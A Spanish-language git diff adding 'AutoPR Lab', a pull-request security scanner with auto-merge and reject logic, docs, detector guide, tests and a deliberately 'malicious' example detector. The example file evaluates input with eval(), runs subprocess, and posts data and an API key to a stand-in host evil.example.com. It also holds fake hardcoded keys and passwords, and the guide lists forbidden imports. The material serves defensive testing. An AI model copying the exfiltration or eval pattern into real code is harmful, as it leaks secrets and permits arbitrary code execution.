Advertencias:** +- **SensitiveFilesDetector**: Archivo de template detectado: `.env.example` en `.env.example` + - Este archivo de ejemplo/template es aceptable si solo contiene placeholders. + - ✅ Asegúrate de que los valores sean ficticios (ej: YOUR_API_KEY_HERE). + +> 🔀 **Este PR ha sido mergeado automáticamente** a pesar de las advertencias. + +--- + +## Escenario 3: PR con Errores → REJECT ❌ + +**PR:** Intenta agregar un detector con API key hardcodeada + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #44 +INFO autopr.scanner | Archivos a analizar: 1 +INFO autopr.scanner | Analizando: detectors/malicious_detector.py +INFO autopr.scanner | [ERROR] APIKeysDetector: Posible OpenAI API Key detectado +INFO autopr.scanner | [ERROR] PasswordsDetector: Password hardcodeado en 'DATABASE_PASSWORD' +INFO autopr.scanner | [ERROR] DetectorFormatValidator: Import prohibido: subprocess +INFO autopr.scanner | [ERROR] DetectorFormatValidator: Función peligrosa: eval() +INFO autopr.scanner | [ERROR] SensitiveFilesDetector: Clave privada RSA detectada +WARNING autopr.scanner | ⚠️ Violaciones de paths: [] +INFO autopr.scanner | ✅ Análisis completado en 134ms +INFO autopr.scanner | Estado: ERROR | Decisión: REJECT +INFO autopr.scanner | Errores: 5 | Advertencias: 0 | OK: 0 +``` + +**Comentario en el PR:** + +--- + +## 🤖 AutoPR Lab — Análisis Completado + +### ❌ DECISIÓN: PR RECHAZADO Y CERRADO + +**❌ Errores críticos:** +- **APIKeysDetector**: Posible OpenAI API Key detectado en `detectors/malicious_detector.py`, línea 14 + - Patrón detectado: `sk-ab****************************ijk` + - ⚠️ Nunca hardcodees credenciales. Usa variables de entorno. +- **PasswordsDetector**: Password hardcodeado en variable 'DATABASE_PASSWORD' + - Variable: `DATABASE_PASSWORD` +- **DetectorFormatValidator**: Import prohibido en detector: `subprocess` + - Los detectores no pueden importar módulos de red o ejecución de código. +- **DetectorFormatValidator**: Función peligrosa en detector: `eval()` + - `eval()` puede ejecutar código arbitrario y está prohibida en detectores. +- **SensitiveFilesDetector**: Contenido sensible: Clave privada PEM + +> 🚫 **Este PR ha sido cerrado automáticamente** por AutoPR Lab. + +--- + +## Escenario 4: Modificación de /core/ → REJECT ❌ + +**PR:** Intenta modificar `core/scanner.py` (ruta prohibida) + +``` +INFO autopr.scanner | 🔍 Iniciando análisis del PR #45 +WARNING autopr.scanner | ⚠️ Violaciones de paths: +WARNING autopr.scanner | 🚫 PROHIBIDO: core/scanner.py (ruta crítica del sistema) +INFO autopr.scanner | ✅ Análisis completado en 12ms +INFO autopr.scanner | Estado: ERROR | Decisión: REJECT +``` + +**Comentario en el PR:** + +--- + +**🛡️ Violaciones de reglas de seguridad:** +- 🚫 PROHIBIDO: `core/scanner.py` (ruta crítica del sistema) + +### 🔧 ¿Cómo corregir este PR? +1. Los archivos modificados deben estar solo en: `/detectors/`, `/tests/`, `/docs/` +2. Para cambios en `/core/` o workflows, abre un issue para revisión manual. + +--- + +## Scan Result JSON (ejemplo) + +```json +{ + "global_status": "ERROR", + "decision": "REJECT", + "pr_number": 44, + "files_analyzed": 1, + "total_findings": 5, + "errors": 5, + "warnings": 0, + "ok_count": 0, + "scan_duration_ms": 134.7, + "detectors_run": [ + "APIKeysDetector", + "PasswordsDetector", + "SensitiveFilesDetector", + "DetectorFormatValidator" + ], + "timestamp": "2025-03-15T10:30:00Z", + "path_validation": { + "paths_ok": true, + "size_ok": true, + "violations": [] + }, + "findings": [ + { + "status": "ERROR", + "detector_name": "APIKeysDetector", + "message": "Posible OpenAI API Key detectado", + "details": [ + "Patrón detectado: `sk-ab****************************ijk`", + "⚠️ Nunca hardcodees credenciales. Usa variables de entorno." + ], + "file_path": "detectors/malicious_detector.py", + "line_number": 14 + } + ] +} +``` diff --git a/docs/how-to-add-detector.md b/docs/how-to-add-detector.md new file mode 100644 index 0000000..5604bc9 --- /dev/null +++ b/docs/how-to-add-detector.md @@ -0,0 +1,187 @@ +# 🔌 Cómo Agregar un Detector a AutoPR Lab + +Esta guía explica paso a paso cómo contribuir con un detector nuevo al sistema. + +## 📋 Requisitos previos + +- Python 3.10+ +- Conocimiento básico de `re` (regex) y `ast` (AST de Python) +- Haber leído el código de un detector existente (ej: `api_keys_detector.py`) + +--- + +## 1. Crear el archivo del detector + +Crea un nuevo archivo en `/detectors/`: + +``` +detectors/ +└── mi_nuevo_detector.py ← Tu archivo aquí +``` + +**Regla de naming:** `nombre_detector.py` en snake_case. + +--- + +## 2. Estructura mínima requerida + +Todo detector **debe** heredar de `BaseDetector` e implementar estos métodos: + +```python +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + + +class MiNuevoDetector(BaseDetector): + + @property + def name(self) -> str: + return "MiNuevoDetector" # Nombre único, sin espacios + + @property + def description(self) -> str: + return "Detecta X en el código" # Una línea descriptiva + + @property + def severity(self) -> str: + return "medium" # "critical" | "high" | "medium" | "low" + + def analyze(self, file_path: str, content: str) -> List[DetectorResult]: + results = [] + + # Tu lógica de análisis aquí + if "algo_sospechoso" in content: + results.append(DetectorResult( + status=DetectorStatus.ERROR, # OK | WARNING | ERROR + detector_name=self.name, + message="Se encontró algo sospechoso", + details=["Detalle 1", "Sugerencia de corrección"], + file_path=file_path, + line_number=1, # Opcional + )) + + return results +``` + +--- + +## 3. Los tres estados posibles + +| Estado | Cuándo usarlo | Efecto en el PR | +|--------|---------------|-----------------| +| `DetectorStatus.OK` | Todo correcto | Contribuye al merge automático | +| `DetectorStatus.WARNING` | Posible problema no crítico | Merge con comentario de advertencia | +| `DetectorStatus.ERROR` | Problema crítico confirmado | PR rechazado y cerrado | + +--- + +## 4. Reglas de seguridad para detectores + +⚠️ **Tu detector será validado automáticamente** por `DetectorFormatValidator`. + +### ✅ Permitido: +```python +import re # ✅ Regex +import os.path # ✅ Operaciones de path +from typing import List # ✅ Type hints +import ast # ✅ Parsing de código +import hashlib # ✅ Hashing +``` + +### ❌ Prohibido (el PR será rechazado): +```python +import subprocess # ❌ Ejecución de comandos +import socket # ❌ Conexiones de red +import requests # ❌ HTTP requests +eval(anything) # ❌ Evaluación de código +exec(anything) # ❌ Ejecución de código +``` + +--- + +## 5. Omitir archivos innecesarios + +Usa `should_skip()` para evitar analizar archivos no relevantes: + +```python +def should_skip(self, file_path: str) -> bool: + # Llamar al padre primero (omite binarios por defecto) + if super().should_skip(file_path): + return True + + # Tu lógica adicional + return not file_path.endswith(".py") # Ej: solo analizar Python +``` + +--- + +## 6. Escribir tests + +Cada detector debe tener tests en `/tests/`: + +```python +# tests/test_mi_nuevo_detector.py +import unittest +from detectors.mi_nuevo_detector import MiNuevoDetector +from detectors.base_detector import DetectorStatus + +class TestMiNuevoDetector(unittest.TestCase): + + def setUp(self): + self.detector = MiNuevoDetector() + + def test_detects_problem(self): + content = "código con algo_sospechoso aquí" + results = self.detector.analyze("archivo.py", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_clean_code_passes(self): + content = "código limpio sin problemas" + results = self.detector.analyze("archivo.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + def test_false_positive_ignored(self): + content = "# esto es un comentario con algo_sospechoso" + results = self.detector.analyze("archivo.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + +if __name__ == "__main__": + unittest.main() +``` + +--- + +## 7. ¿Qué pasa después? + +1. Abres un PR con tu nuevo archivo en `/detectors/` y su test en `/tests/` +2. AutoPR Lab analiza automáticamente tu PR +3. `DetectorFormatValidator` valida la estructura de tu detector +4. Si pasa → **merge automático** ✅ +5. Si falla → comentario con los problemas específicos ❌ + +--- + +## 8. Ejemplos de detectores existentes + +| Detector | Detecta | Complejidad | +|----------|---------|-------------| +| `api_keys_detector.py` | API keys y tokens | Media | +| `passwords_detector.py` | Contraseñas hardcodeadas | Media | +| `sensitive_files_detector.py` | Archivos sensibles | Media | +| `detector_validator.py` | Formato de detectores | Alta | + +--- + +## 9. Ideas para nuevos detectores + +- `sql_injection_detector.py` — Queries SQL con f-strings/concatenación +- `debug_code_detector.py` — `print()`, `console.log()`, `debugger` en producción +- `todo_comments_detector.py` — TODO/FIXME/HACK en código crítico +- `license_header_detector.py` — Archivos sin header de licencia +- `dependency_version_detector.py` — Dependencias sin versión pinneada + +--- + +¿Tienes dudas? [Abre un issue](../../issues/new) en el repositorio. diff --git a/examples/invalid-pr/malicious_detector.py b/examples/invalid-pr/malicious_detector.py new file mode 100644 index 0000000..e1149f9 --- /dev/null +++ b/examples/invalid-pr/malicious_detector.py @@ -0,0 +1,54 @@ +""" +Ejemplo de PR INVÁLIDO — Detector malicioso/mal formado +========================================================= +Este archivo representa lo que AutoPR Lab RECHAZARÁ automáticamente. + +❌ Tiene imports de red prohibidos (requests) +❌ Usa subprocess para ejecución de comandos +❌ Usa eval() (ejecución de código arbitrario) +❌ Tiene una API key hardcodeada +❌ Tiene una password hardcodeada + +AutoPR Lab detectará estos problemas y: +1. Agregará un comentario detallando cada error +2. Cerrará el PR automáticamente +""" + +# ❌ IMPORTS PROHIBIDOS +import subprocess + +import requests # No permitido en detectores + +# ❌ API KEY HARDCODEADA (APIKeysDetector la detectará) +OPENAI_API_KEY = "sk-abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk" +GITHUB_TOKEN = "ghp_1234567890abcdefghijklmnopqrstuvwxyz12" + +# ❌ PASSWORD HARDCODEADA (PasswordsDetector la detectará) +DATABASE_PASSWORD = "mysupersecretpassword123" +admin_password = "admin123" + + +# ❌ No hereda de BaseDetector (DetectorFormatValidator lo detectará) +class MaliciousDetector: + def analyze(self, file_path: str, content: str): + # ❌ Ejecución de código arbitrario + eval(content) + + # ❌ Ejecución de comandos del sistema + _ = subprocess.run(["cat", file_path], capture_output=True) + + # ❌ Conexión de red para exfiltrar datos + requests.post( + "https://evil.example.com/steal", + json={"content": content, "api_key": OPENAI_API_KEY}, + ) + + return [] + + +# ❌ RSA Private Key en el código +PRIVATE_KEY = """ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEA1234567890abcdefghijklmnopqrstuvwxyz... +-----END RSA PRIVATE KEY----- +""" diff --git a/examples/valid-pr/sql_injection_detector.py b/examples/valid-pr/sql_injection_detector.py new file mode 100644 index 0000000..1663e07 --- /dev/null +++ b/examples/valid-pr/sql_injection_detector.py @@ -0,0 +1,114 @@ +""" +Ejemplo de PR VÁLIDO — Nuevo detector de SQL Injection +======================================================= +Este archivo representa un PR que AutoPR Lab ACEPTARÁ y mergeará automáticamente. + +✅ Está en /detectors/ (ruta permitida) +✅ Hereda de BaseDetector +✅ No tiene imports peligrosos +✅ Implementa todos los métodos requeridos +✅ No contiene secretos ni credenciales +""" + +import re + +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus + + +class SQLInjectionDetector(BaseDetector): + """ + Detecta posibles vulnerabilidades de SQL Injection en el código. + Busca queries construidas por concatenación o f-strings en lugar de + parámetros preparados (prepared statements). + """ + + # Patrones de SQL injection potencial + PATTERNS = [ + # f-strings con SQL + ( + r'f["\'].*?(SELECT|INSERT|UPDATE|DELETE|DROP|CREATE).*?\{', + "SQL con f-string", + ), + # Concatenación de strings con SQL + ( + r'["\'].*?(SELECT|INSERT|UPDATE|DELETE).*?["\']\s*\+\s*\w+', + "SQL con concatenación", + ), + # format() en queries SQL + ( + r'["\'].*?(SELECT|INSERT|UPDATE|DELETE).*?["\']\.format\(', + "SQL con .format()", + ), + # % formatting en queries SQL + (r'["\'].*?(SELECT|INSERT|UPDATE|DELETE).*?%\s*[\(\w]', "SQL con % formatting"), + # execute() con concatenación directa (peligroso) + (r'\.execute\s*\(\s*["\'].*?\+', "execute() con concatenación"), + (r'\.execute\s*\(\s*f["\']', "execute() con f-string"), + ] + + # Patrones seguros (prepared statements / parameterized queries) + SAFE_PATTERNS = [ + r"\.execute\s*\(\s*['\"].*?\?", # SQLite/MySQL con ? + r"\.execute\s*\(\s*['\"].*?%s", # psycopg2 con %s + r"\.execute\s*\(\s*['\"].*?:\w+", # SQLAlchemy con :param + r"text\(['\"]", # SQLAlchemy text() + r"sqlalchemy", # SQLAlchemy en general + ] + + SQL_FILE_EXTENSIONS = {".py", ".js", ".ts", ".php", ".rb", ".java", ".cs", ".go"} + + @property + def name(self) -> str: + return "SQLInjectionDetector" + + @property + def description(self) -> str: + return "Detecta posibles vulnerabilidades de SQL Injection por concatenación de strings" + + @property + def severity(self) -> str: + return "critical" + + def should_skip(self, file_path: str) -> bool: + if super().should_skip(file_path): + return True + _, ext = file_path.rsplit(".", 1) if "." in file_path else (file_path, "") + return f".{ext}" not in self.SQL_FILE_EXTENSIONS + + def _has_safe_pattern(self, line: str) -> bool: + return any(re.search(p, line, re.IGNORECASE) for p in self.SAFE_PATTERNS) + + def analyze(self, file_path: str, content: str) -> list[DetectorResult]: + if self.should_skip(file_path): + return [] + + results = [] + lines = content.splitlines() + + for line_num, line in enumerate(lines, start=1): + if self._has_safe_pattern(line): + continue + if line.strip().startswith("#") or line.strip().startswith("//"): + continue + + for pattern, description in self.PATTERNS: + if re.search(pattern, line, re.IGNORECASE): + results.append( + DetectorResult( + status=DetectorStatus.ERROR, + detector_name=self.name, + message=f"Posible SQL Injection: {description}", + details=[ + f"Línea problemática: `{line.strip()[:100]}`", + "🔒 Usa prepared statements o parámetros vinculados:", + " ✅ cursor.execute('SELECT * FROM users WHERE id = ?', (user_id,))", + " ✅ cursor.execute('SELECT * FROM users WHERE id = %s', (user_id,))", + " ❌ cursor.execute(f'SELECT * FROM users WHERE id = {user_id}')", + ], + file_path=file_path, + line_number=line_num, + ) + ) + break + + return results diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 0000000..e424731 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,135 @@ +[build-system] +requires = ["setuptools>=61.0", "wheel"] +build-backend = "setuptools.build_meta" + +[project] +name = "autopr-lab" +version = "1.0.0" +description = "Sistema de revisión y merge automático de Pull Requests con análisis de seguridad integrado" +readme = "README.md" +requires-python = ">=3.11" +license = {text = "MIT"} +authors = [ + {name = "AutoPR Lab Team", email = "team@autopr.lab"} +] +keywords = ["github", "pull-request", "security", "automation", "ci-cd"] +classifiers = [ + "Development Status :: 5 - Production/Stable", + "Intended Audience :: Developers", + "License :: OSI Approved :: MIT License", + "Programming Language :: Python :: 3", + "Programming Language :: Python :: 3.10", + "Programming Language :: Python :: 3.11", + "Programming Language :: Python :: 3.12", + "Programming Language :: Python :: 3.13", + "Topic :: Software Development :: Libraries :: Python Modules", + "Topic :: Security", + "Topic :: System :: Software Distribution" +] + +[project.optional-dependencies] +dev = [ + "pytest>=8.0.0", + "pytest-cov>=5.0.0", + "ruff>=0.8.0", + "mypy>=1.9.0" +] +security = [ + "safety>=3.0.0", + "bandit>=1.7.0" +] + +[project.urls] +Homepage = "https://github.com/Devsebastian44/pull-shark-test" +Repository = "https://github.com/Devsebastian44/pull-shark-test" +Documentation = "https://github.com/Devsebastian44/pull-shark-test/docs" +"Bug Tracker" = "https://github.com/Devsebastian44/pull-shark-test/issues" + +[tool.setuptools.packages.find] +where = ["."] +include = ["core*", "detectors*", "utils*", "scripts*"] + +[tool.ruff] +line-length = 88 +target-version = "py313" +include = ["*.py"] +exclude = [ + ".git", + "__pycache__", + "build", + "dist", + ".venv", + "venv" +] + +[tool.ruff.lint] +select = [ + "E", # pycodestyle errors + "W", # pycodestyle warnings + "F", # pyflakes + "I", # isort + "B", # flake8-bugbear + "C4", # flake8-comprehensions + "UP", # pyupgrade +] +ignore = [ + "E501", # line too long, handled by black + "B008", # do not perform function calls in argument defaults +] + +[tool.ruff.format] +quote-style = "double" +indent-style = "space" + +[tool.mypy] +python_version = "3.13" +strict = true +warn_return_any = true +warn_unused_configs = true +disallow_untyped_defs = true +disallow_incomplete_defs = true +check_untyped_defs = true +disallow_untyped_decorators = true +no_implicit_optional = true +warn_redundant_casts = true +warn_unused_ignores = true +warn_no_return = true +warn_unreachable = true +strict_equality = true + +[tool.pytest.ini_options] +minversion = "8.0" +addopts = "-ra -q --strict-markers --strict-config" +testpaths = ["tests"] +markers = [ + "slow: marks tests as slow (deselect with '-m \"not slow\"')", + "integration: marks tests as integration tests", + "unit: marks tests as unit tests" +] + +[tool.coverage.run] +source = ["."] +omit = [ + "tests/*", + ".venv/*", + "venv/*", + "*/site-packages/*" +] + +[tool.coverage.report] +exclude_lines = [ + "pragma: no cover", + "def __repr__", + "if self.debug:", + "if settings.DEBUG", + "raise AssertionError", + "raise NotImplementedError", + "if 0:", + "if __name__ == .__main__.:" +] + +[[tool.mypy.overrides]] +module = "tests.*" +disallow_untyped_defs = false +disallow_incomplete_defs = false +check_untyped_defs = false diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..c0d4486 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,15 @@ +# AutoPR Lab - Dependencies +# Solo usa módulos de la biblioteca estándar de Python 3.10+ +# No se requieren dependencias externas para el core del sistema. + +# Testing (opcional, para desarrollo local) +pytest>=8.0.0 +pytest-cov>=5.0.0 + +# Linting y formato (opcional, para CI adicional) +ruff>=0.8.0 +mypy>=1.9.0 + +# Herramientas de seguridad (opcional, para escaneo) +safety>=3.0.0 +bandit>=1.7.0 diff --git a/scripts/decision_engine.py b/scripts/decision_engine.py new file mode 100644 index 0000000..743b25a --- /dev/null +++ b/scripts/decision_engine.py @@ -0,0 +1,268 @@ +#!/usr/bin/env python3 +""" +AutoPR Lab - Decision Engine +============================== +Script principal invocado por GitHub Actions. +Orquesta el análisis completo y ejecuta la decisión automática. + +Uso: + python scripts/decision_engine.py + +Variables de entorno requeridas: + GITHUB_TOKEN - Token del workflow de GitHub Actions + GITHUB_REPO - Repositorio en formato "owner/repo" + PR_NUMBER - Número del Pull Request + PR_BASE_BRANCH - Branch destino del PR (opcional, default: main) + +Variables opcionales: + DRY_RUN - Si es "true", no ejecuta acciones (solo analiza) + LOG_LEVEL - Nivel de logging (DEBUG, INFO, WARNING, ERROR) +""" + +import json +import os +import sys + +# Agregar el directorio raíz al path para imports +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +from core.scanner import Scanner, ScanResult +from utils.comment_templates import ( + build_merge_comment, + build_reject_comment, + build_warn_merge_comment, +) +from utils.github_api import GitHubAPI, GitHubAPIError +from utils.logger import get_logger + +logger = get_logger("decision_engine") + + +def get_required_env(name: str) -> str: + """Obtiene una variable de entorno requerida o termina con error.""" + value = os.environ.get(name, "").strip() + if not value: + logger.error(f"Variable de entorno requerida no encontrada: {name}") + sys.exit(1) + return value + + +def collect_pr_files(github: GitHubAPI) -> tuple[dict[str, str], int]: + """ + Descarga los archivos modificados del PR. + Intenta obtener el contenido completo de cada archivo. + + Returns: + ({file_path: content}, total_lines_changed) + """ + logger.info("📥 Descargando archivos del PR...") + pr_info = github.get_pr_info() + head_sha = pr_info.get("head", {}).get("sha", "") + changed_files_info = github.get_changed_files() + + changed_files = {} + total_lines = 0 + + for file_info in changed_files_info: + file_path = file_info.get("filename", "") + additions = file_info.get("additions", 0) + deletions = file_info.get("deletions", 0) + total_lines += additions + deletions + + raw_url = file_info.get("raw_url", "") + status = file_info.get("status", "") + + # Si el archivo fue eliminado, usar string vacío para el análisis + if status == "removed": + changed_files[file_path] = "" + logger.info(f" 📄 {file_path} (eliminado)") + continue + + # Descargar contenido completo + content = "" + if raw_url: + content = github.get_file_content(raw_url) + + # Fallback: si raw_url falló o no existe, intentar por API de contenidos + if not content and head_sha: + logger.debug(f" ⚠️ Usando fallback para {file_path}") + content = github.get_file_content_by_path(file_path, head_sha) + + # Último recurso: usar el patch (no recomendado por ser incompleto) + if not content: + patch = file_info.get("patch", "") + if patch: + logger.warning( + f" ⚠️ Escaneando solo el fragmento (patch) de {file_path}" + ) + content = patch + + changed_files[file_path] = content + logger.info(f" 📄 {file_path} (+{additions}/-{deletions})") + + logger.info( + f" Total: {len(changed_files)} archivos, {total_lines} líneas cambiadas" + ) + return changed_files, total_lines + + +def execute_decision( + github: GitHubAPI, + result: ScanResult, + dry_run: bool = False, +) -> int: + """ + Ejecuta la decisión basada en el resultado del análisis. + + Returns: + Exit code: 0 = éxito, 1 = PR rechazado, 2 = error + """ + decision = result.decision + pr_number = result.pr_number + + logger.info("") + logger.info(f"{'=' * 60}") + logger.info(f" DECISIÓN FINAL: {decision}") + logger.info(f"{'=' * 60}") + logger.info(f" PR #{pr_number}") + logger.info(f" Estado: {result.global_status}") + logger.info(f" Errores: {result.errors} | Advertencias: {result.warnings}") + logger.info(f"{'=' * 60}") + logger.info("") + + if dry_run: + logger.info("🔍 DRY RUN activado — No se ejecutarán acciones reales") + logger.info(f" Decisión que se tomaría: {decision}") + print(json.dumps(result.to_dict(), indent=2, ensure_ascii=False)) + return 0 + + try: + if decision == "MERGE": + # ── PR Limpio: Aprobar + Merge ────────────────────────────── + logger.info("✅ Ejecutando: APPROVE + MERGE") + + github.approve_pr( + "AutoPR Lab: ✅ Análisis de seguridad completado sin problemas." + ) + github.merge_pr( + commit_title=f"[AutoPR] Merge PR #{pr_number} (auto-approved)", + commit_message=( + f"AutoPR Lab: Merge automático del PR #{pr_number}\n\n" + f"Detectores ejecutados: {len(result.detectors_run)}\n" + f"Archivos analizados: {result.files_analyzed}\n" + f"Resultado: {result.global_status}" + ), + merge_method="squash", + ) + github.add_comment(build_merge_comment(result)) + logger.info("✅ PR mergeado exitosamente") + return 0 + + elif decision == "WARN_MERGE": + # ── PR con Advertencias: Aprobar + Merge + Comentario ─────── + logger.info("⚠️ Ejecutando: APPROVE + MERGE (con advertencias)") + + github.approve_pr( + f"AutoPR Lab: ⚠️ Aprobado con {result.warnings} advertencia(s). " + "Ver comentario para detalles." + ) + github.merge_pr( + commit_title=f"[AutoPR] Merge PR #{pr_number} (warnings)", + merge_method="squash", + ) + github.add_comment(build_warn_merge_comment(result)) + logger.info("⚠️ PR mergeado con advertencias") + return 0 + + elif decision == "REJECT": + # ── PR con Errores: Comentar + Cerrar ─────────────────────── + logger.info("❌ Ejecutando: COMMENT + CLOSE") + + github.add_comment(build_reject_comment(result)) + github.close_pr() + logger.info("❌ PR rechazado y cerrado") + + # Salir con código de error para que el workflow falle + return 1 + + else: + logger.error(f"Decisión desconocida: {decision}") + return 2 + + except GitHubAPIError as e: + logger.error(f"Error de GitHub API: {e}") + logger.error(f" Status code: {e.status_code}") + logger.error(f" Respuesta: {e.response[:200]}") + return 2 + + +def main() -> int: + """Función principal del decision engine.""" + logger.info("") + logger.info("🚀 AutoPR Lab — Decision Engine v1.0") + logger.info("=" * 50) + + # ── Configuración ────────────────────────────────────────────────── + token = get_required_env("GITHUB_TOKEN") + repo = get_required_env("GITHUB_REPOSITORY") + pr_number_str = get_required_env("PR_NUMBER") + dry_run = os.environ.get("DRY_RUN", "false").lower() == "true" + + try: + pr_number = int(pr_number_str) + except ValueError: + logger.error(f"PR_NUMBER inválido: '{pr_number_str}'") + sys.exit(1) + + logger.info(f" Repositorio: {repo}") + logger.info(f" PR: #{pr_number}") + logger.info(f" Dry Run: {dry_run}") + logger.info("") + + # ── GitHub API ───────────────────────────────────────────────────── + github = GitHubAPI(token=token, repo=repo, pr_number=pr_number) + + # ── Descargar archivos del PR ─────────────────────────────────────── + try: + changed_files, total_lines = collect_pr_files(github) + except GitHubAPIError as e: + logger.error(f"No se pudieron obtener los archivos del PR: {e}") + sys.exit(2) + + if not changed_files: + logger.warning("El PR no tiene archivos modificados detectables") + sys.exit(0) + + # ── Análisis con Scanner ─────────────────────────────────────────── + scanner = Scanner() + result = scanner.scan_pr( + pr_number=pr_number, + changed_files=changed_files, + lines_changed=total_lines, + ) + + # ── Guardar resultado como artefacto ─────────────────────────────── + output_path = os.environ.get("SCAN_OUTPUT", "scan_result.json") + with open(output_path, "w") as f: + f.write(result.to_json()) + logger.info(f"📄 Resultado guardado en: {output_path}") + + # Exportar para GitHub Actions outputs + github_output = os.environ.get("GITHUB_OUTPUT", "") + if github_output: + with open(github_output, "a") as f: + f.write(f"decision={result.decision}\n") + f.write(f"status={result.global_status}\n") + f.write(f"errors={result.errors}\n") + f.write(f"warnings={result.warnings}\n") + + # ── Ejecutar decisión ────────────────────────────────────────────── + exit_code = execute_decision(github, result, dry_run=dry_run) + + logger.info("") + logger.info(f"AutoPR Lab finalizado con código: {exit_code}") + return exit_code + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/scripts/validate_detectors.py b/scripts/validate_detectors.py new file mode 100644 index 0000000..e1d27c5 --- /dev/null +++ b/scripts/validate_detectors.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python3 +""" +AutoPR Lab - Detectors Validator Script +======================================== +Valida todos los detectores del proyecto usando el DetectorFormatValidator. +""" + +import os +import sys +from typing import Any, cast + +# Agregar el directorio raíz al path +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +from detectors import discover_detectors +from detectors.detector_validator import DetectorFormatValidator + + +def validate_all() -> None: + print("Validando estructura de detectores registrados...") + + validator = DetectorFormatValidator() + detector_classes = discover_detectors() + + detectors_dir = os.path.join( + os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "detectors" + ) + + any_error = False + results = [] + + for cls in detector_classes: + # Obtener el path del archivo de la clase + module = sys.modules.get(cls.__module__) + if not module or not hasattr(module, "__file__") or not module.__file__: + continue + + file_path = module.__file__ + rel_path = os.path.relpath(file_path, os.path.dirname(detectors_dir)) + + with open(file_path, encoding="utf-8") as f: + content = f.read() + + findings = validator.analyze(rel_path, content) + + # Filtrar solo errores + errors = [f for f in findings if f.status == "ERROR"] + is_valid = len(errors) == 0 + + if not is_valid: + any_error = True + + results.append( + { + "name": cls.__name__, + "path": rel_path, + "is_valid": is_valid, + "errors": [f.message for f in errors], + } + ) + + print(f"Validacion completada: {len(results)} detectores verificados") + for r in results: + data = cast(dict[str, Any], r) + status = "OK" if data["is_valid"] else "FAIL" + print(f" [{status}] {data['name']} ({data['path']})") + for err in cast(list[str], data["errors"]): + print(f" └─ ERROR: {err}") + + if any_error: + sys.exit(1) + else: + sys.exit(0) + + +if __name__ == "__main__": + validate_all() diff --git a/shark.md b/shark.md deleted file mode 100644 index ebfc253..0000000 --- a/shark.md +++ /dev/null @@ -1 +0,0 @@ -Probando logro Pull Shark diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 0000000..d5c134e --- /dev/null +++ b/tests/__init__.py @@ -0,0 +1 @@ +"""AutoPR Lab - Tests Package""" diff --git a/tests/test_detectors.py b/tests/test_detectors.py new file mode 100644 index 0000000..6855208 --- /dev/null +++ b/tests/test_detectors.py @@ -0,0 +1,243 @@ +""" +AutoPR Lab - Tests para Detectores +===================================== +Tests unitarios para validar que los detectores funcionan correctamente. +""" + +import os +import sys + +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import unittest + +from detectors.api_keys_detector import APIKeysDetector +from detectors.base_detector import DetectorStatus +from detectors.passwords_detector import PasswordsDetector +from detectors.sensitive_files_detector import SensitiveFilesDetector + + +class TestAPIKeysDetector(unittest.TestCase): + def setUp(self): + self.detector = APIKeysDetector() + + def test_detects_github_token(self): + content = 'TOKEN = "ghp_1234567890abcdefghijklmnopqrstuvwxyz12"' + results = self.detector.analyze("config.py", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_openai_key(self): + content = 'OPENAI_KEY = "sk-abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"' + results = self.detector.analyze("app.py", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_rsa_private_key(self): + content = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA..." + results = self.detector.analyze("key.txt", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_database_url_with_credentials(self): + content = 'DATABASE_URL = "postgresql://user:mypassword123@localhost/mydb"' + results = self.detector.analyze("settings.py", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_ignores_env_var_reading(self): + """El código que LEE variables de entorno es seguro.""" + content = 'api_key = os.getenv("MY_API_KEY")' + results = self.detector.analyze("app.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + def test_ignores_placeholder(self): + """Los placeholders en templates no son errores.""" + content = "API_KEY=your_api_key_here" + results = self.detector.analyze("README.md", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + def test_skips_binary_files(self): + content = "binary content" + results = self.detector.analyze("image.png", content) + self.assertEqual(len(results), 0) + + +class TestPasswordsDetector(unittest.TestCase): + def setUp(self): + self.detector = PasswordsDetector() + + def test_detects_hardcoded_password(self): + content = 'password = "mysecretpassword123"' + results = self.detector.analyze("config.py", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_detects_trivial_password(self): + content = 'PASSWORD = "admin"' + results = self.detector.analyze("settings.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertTrue(len(errors) > 0) + # Verificar que menciona que es trivial + has_trivial_warning = any( + "trivial" in str(r.details).lower() or "crítico" in str(r.details).lower() + for r in errors + ) + self.assertTrue(has_trivial_warning) + + def test_detects_json_credential(self): + content = '{"password": "secretvalue123"}' + results = self.detector.analyze("config.json", content) + self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results)) + + def test_ignores_env_var_access(self): + content = 'db_pass = os.getenv("DB_PASSWORD")' + results = self.detector.analyze("db.py", content) + errors = [r for r in results if r.status == DetectorStatus.ERROR] + self.assertEqual(len(errors), 0) + + def test_ignores_commented_line(self): + content = '# password = "example_do_not_use"' + results = 